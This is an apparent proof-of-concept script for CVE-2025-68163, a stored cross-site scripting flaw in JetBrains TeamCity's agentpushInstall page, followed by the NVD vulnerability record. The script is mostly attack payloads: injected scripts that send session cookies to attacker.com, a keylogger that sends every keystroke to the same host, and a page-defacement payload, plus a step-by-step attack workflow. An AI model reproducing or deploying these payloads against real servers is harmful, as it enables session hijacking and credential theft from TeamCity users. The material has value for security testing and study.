CVE-2025-68163

// CVE-2025-68163 PoC - Stored XSS in JetBrains TeamCity agentpushInstall page // This is a conceptual PoC for educational and security testing purposes only // Step 1: Identify the vulnerable endpoint // Target: https://<teamcity-server>/agentpushInstall // Step 2: Inject malicious JavaScript payload // The payload would be injected into input fields on the agentpushInstall page const maliciousPayload = `<script>alert('XSS Vulnerability - CVE-2025-68163');document.location='https://attacker.com/steal?cookie='+document.cookie;</script>`; // Step 3: Example attack scenarios // 1. Session hijacking - steal session cookies const stealCookies = `<script>fetch('https://attacker.com/log?c='+btoa(document.cookie));</script>`; // 2. Keylogging - capture user keystrokes const keylogger = `<script>document.onkeypress=function(e){fetch('https://attacker.com/klog?k='+e.key);}</script>`; // 3. DOM manipulation - modify page content const domManipulation = `<script>document.body.innerHTML='<h1>Site Under Maintenance</h1>';</script>`; // Step 4: Attack workflow // - Attacker with high privileges accesses agentpushInstall page // - Injects malicious script into vulnerable input field // - Script is stored on the server // - When other users visit the page, the script executes in their browser // - Attacker can steal session tokens, credentials, or perform actions on behalf of users console.log('CVE-2025-68163 - Stored XSS in TeamCity agentpushInstall'); console.log('Payload:', maliciousPayload);

{"cve": {"id": "CVE-2025-68163", "sourceIdentifier": "[email protected]", "published": "2025-12-16T16:16:05.937", "lastModified": "2025-12-18T19:23:12.320", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "In JetBrains TeamCity before 2025.11 stored XSS was possible on agentpushInstall page"}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:U/C:L/I:L/A:N", "baseScore": 3.5, "baseSeverity": "LOW", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "HIGH", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 0.9, "impactScore": 2.5}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N", "baseScore": 4.8, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "HIGH", "userInteraction": "REQUIRED", "scope": "CHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 1.7, "impactScore": 2.7}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-79"}]}, {"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-79"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:jetbrains:teamcity:*:*:*:*:*:*:*:*", "versionEndExcluding": "2025.11", "matchCriteriaId": "D80D5E22-CFD6-4363-948C-9473EFCE21A5"}]}]}], "references": [{"url": "https://www.jetbrains.com/privacy-security/issues-fixed/", "source": "[email protected]", "tags": ["Vendor Advisory"]}]}}